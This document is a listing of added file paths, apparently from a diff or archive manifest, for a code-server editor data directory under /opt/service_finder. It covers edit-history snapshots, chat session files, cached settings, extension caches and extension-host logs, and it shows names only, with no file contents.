+/opt/service_finder/.vscode_config/.local/share/code-server/User/History/482da0ce/BmNE.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/482da0ce/ygWW.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/482da0ce/JkM4.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/482da0ce/vXZn.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/482da0ce/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/482da0ce/80T3.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2dfbf341 +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2dfbf341/ODc4.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2dfbf341/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/7f158c21 +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/7f158c21/boV7.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/7f158c21/YrVj.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/7f158c21/HZag.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/7f158c21/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-29478f5a +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-29478f5a/7nUD.html +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-29478f5a/7RNJ.html +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-29478f5a/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-29478f5a/sXKD.html +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6 +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/qJx6.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/bhdY.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/ijQU.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/y4wO.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/hvQT.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/050l.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/GvWk.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/zL5Z.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/MBN5.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/1Wcb.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/3lLA.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/Idyc.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/XMdd.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/idGt.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/EPKR.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/B8LJ.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/tH4a.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/WFKT.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/tdIL.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/o0de.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/wHkk.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/Mitr.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/oPES.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/Z41x.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/dHye.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/U3Ka.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/ubte.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/ZWas.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/JWGo.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/02ru.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/KpqL.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/T3ZI.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/jvRS.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/uqUj.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/1rv6.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/svCD.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/UGQ0.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/osuu.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-7b58b5d6/tIVo.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-28e08209 +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-28e08209/9bkE.js +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-28e08209/iTJO.js +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-28e08209/kDT5.js +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-28e08209/HX3Q.js +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-28e08209/xlBZ.js +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-28e08209/j8yo.js +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-28e08209/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-28e08209/Op5k.js +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-313525dc +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-313525dc/i1Mz.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-313525dc/hCmo.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-313525dc/Yaw8.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-313525dc/qGmF.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-313525dc/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620 +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/h0BB.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/RqAp.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/Q24H.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/TSPO.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/8qGj.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/JN94.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/UByK.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/DNRT.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/7EsO.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/6wTV.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/yB5I.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/Oz0u.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/zzJc.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/RFXX.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/fkoN.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/U9VF.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/rjTt.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/ZRXr.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/K65d.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/MGH0.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/8ynW.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/30Gc.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/mcXH.txt +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5fbeb620/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/16f2aca3 +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/16f2aca3/VQUx.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/16f2aca3/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-6c451dfd +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-6c451dfd/MAmy.yml +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-6c451dfd/tend.yml +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-6c451dfd/YU8u.yml +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-6c451dfd/OUJK.yml +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-6c451dfd/Y5jQ.yml +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-6c451dfd/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/683e8c8 +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/683e8c8/5Yhv.vue +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/683e8c8/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-177b50f1 +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-177b50f1/8jA8.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-177b50f1/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5e8dc48 +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5e8dc48/iG1d.vue +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-5e8dc48/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/3a2679b3 +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/3a2679b3/Gkgh +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/3a2679b3/Fkxq +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/3a2679b3/seFg +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/3a2679b3/gPhh +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/3a2679b3/OjCf +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/3a2679b3/ZGkr +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/3a2679b3/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/3a2679b3/WoD2 +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-330f7e6f +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-330f7e6f/vGYE.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-330f7e6f/3wpa.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-330f7e6f/iNBu.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/-330f7e6f/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1 +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1/bTeN.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1/ituT.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1/k8QY.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1/wfux.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1/qisA.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1/ubPt.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1/U2Wc.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1/z0Q8.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1/yo8t.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1/JINX.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1/VgEg.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1/UqDk.py +/opt/service_finder/.vscode_config/.local/share/code-server/User/History/2e5f3cd1/entries.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/caches +/opt/service_finder/.vscode_config/.local/share/code-server/User/caches/CachedConfigurations +/opt/service_finder/.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder +/opt/service_finder/.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/-461341b9 +/opt/service_finder/.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/-461341b9/configuration.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/-39141af6 +/opt/service_finder/.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/-39141af6/configuration.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/f83f4cd +/opt/service_finder/.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/f83f4cd/configuration.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/20ae27a4 +/opt/service_finder/.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/20ae27a4/configuration.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/-23d72190 +/opt/service_finder/.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/-23d72190/configuration.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/snippets +/opt/service_finder/.vscode_config/.local/share/code-server/User/globalStorage +/opt/service_finder/.vscode_config/.local/share/code-server/User/systemExtensionsCache.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/meta.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/fe93b71a-e55f-4e3f-a4e7-7e7d3918caa3 +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/fe93b71a-e55f-4e3f-a4e7-7e7d3918caa3/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/fe93b71a-e55f-4e3f-a4e7-7e7d3918caa3/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/e76151b8-00f8-42d1-94ff-80dcf97afcf8 +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/e76151b8-00f8-42d1-94ff-80dcf97afcf8/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/e76151b8-00f8-42d1-94ff-80dcf97afcf8/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/572c40db-876c-4fa1-ab7a-d8151bdaedb1 +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/572c40db-876c-4fa1-ab7a-d8151bdaedb1/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/572c40db-876c-4fa1-ab7a-d8151bdaedb1/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatSessions +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatSessions/e76151b8-00f8-42d1-94ff-80dcf97afcf8.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatSessions/572c40db-876c-4fa1-ab7a-d8151bdaedb1.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatSessions/fe93b71a-e55f-4e3f-a4e7-7e7d3918caa3.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/meta.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/3565f851-786d-46f9-98bf-2b88b4789a3e +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/3565f851-786d-46f9-98bf-2b88b4789a3e/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/3565f851-786d-46f9-98bf-2b88b4789a3e/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/1a3a721a-9b05-496e-9cd4-91890682a7c2 +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/1a3a721a-9b05-496e-9cd4-91890682a7c2/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/1a3a721a-9b05-496e-9cd4-91890682a7c2/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/7a659de8-2306-4f81-bbc1-b5fa93a5527e +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/7a659de8-2306-4f81-bbc1-b5fa93a5527e/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/7a659de8-2306-4f81-bbc1-b5fa93a5527e/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/4f44a27a-de0a-4e31-904f-212ba1423280 +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/4f44a27a-de0a-4e31-904f-212ba1423280/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/4f44a27a-de0a-4e31-904f-212ba1423280/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatSessions +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatSessions/7a659de8-2306-4f81-bbc1-b5fa93a5527e.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatSessions/1a3a721a-9b05-496e-9cd4-91890682a7c2.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatSessions/3565f851-786d-46f9-98bf-2b88b4789a3e.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatSessions/4f44a27a-de0a-4e31-904f-212ba1423280.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-53e2bffc +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-53e2bffc/meta.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/meta.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/d9f9e18e-5e68-4fad-8ff9-f520bbdccd72 +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/d9f9e18e-5e68-4fad-8ff9-f520bbdccd72/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/d9f9e18e-5e68-4fad-8ff9-f520bbdccd72/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/810c61e8-420b-4c2d-b90d-78405f575e10 +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/810c61e8-420b-4c2d-b90d-78405f575e10/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/810c61e8-420b-4c2d-b90d-78405f575e10/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/5127fd56-e03a-4cc6-8376-e74d4e23ce7c +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/5127fd56-e03a-4cc6-8376-e74d4e23ce7c/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/5127fd56-e03a-4cc6-8376-e74d4e23ce7c/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/5cf441f2-ab0c-446e-a7ad-87e3c3bfea3c +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/5cf441f2-ab0c-446e-a7ad-87e3c3bfea3c/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/5cf441f2-ab0c-446e-a7ad-87e3c3bfea3c/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/1c1e6083-b4f9-42e4-ae28-2f71caba0cf4 +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/1c1e6083-b4f9-42e4-ae28-2f71caba0cf4/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/1c1e6083-b4f9-42e4-ae28-2f71caba0cf4/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/afa463b1-e6ec-42f8-8aca-aa89ccce4936 +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/afa463b1-e6ec-42f8-8aca-aa89ccce4936/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/afa463b1-e6ec-42f8-8aca-aa89ccce4936/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatSessions +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatSessions/810c61e8-420b-4c2d-b90d-78405f575e10.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatSessions/1c1e6083-b4f9-42e4-ae28-2f71caba0cf4.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatSessions/5127fd56-e03a-4cc6-8376-e74d4e23ce7c.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatSessions/5cf441f2-ab0c-446e-a7ad-87e3c3bfea3c.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatSessions/d9f9e18e-5e68-4fad-8ff9-f520bbdccd72.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatSessions/afa463b1-e6ec-42f8-8aca-aa89ccce4936.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-ad48359 +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-ad48359/meta.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-ad48359/chatEditingSessions +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-ad48359/chatEditingSessions/d4cc21e9-36f6-444d-b20c-4c91876bba2b +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-ad48359/chatEditingSessions/d4cc21e9-36f6-444d-b20c-4c91876bba2b/state.json +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-ad48359/chatEditingSessions/d4cc21e9-36f6-444d-b20c-4c91876bba2b/contents +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-ad48359/chatSessions +/opt/service_finder/.vscode_config/.local/share/code-server/User/workspaceStorage/-ad48359/chatSessions/d4cc21e9-36f6-444d-b20c-4c91876bba2b.json +/opt/service_finder/.vscode_config/.local/share/code-server/extensions +/opt/service_finder/.vscode_config/.local/share/code-server/extensions/extensions.json +/opt/service_finder/.vscode_config/.local/share/code-server/CachedProfilesData +/opt/service_finder/.vscode_config/.local/share/code-server/CachedProfilesData/__default__profile__ +/opt/service_finder/.vscode_config/.local/share/code-server/CachedProfilesData/__default__profile__/extensions.user.cache +/opt/service_finder/.vscode_config/.local/share/code-server/CachedProfilesData/__default__profile__/extensions.builtin.cache +/opt/service_finder/.vscode_config/.local/share/code-server/heartbeat +/opt/service_finder/.vscode_config/.local/share/code-server/logs +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.github-authentication 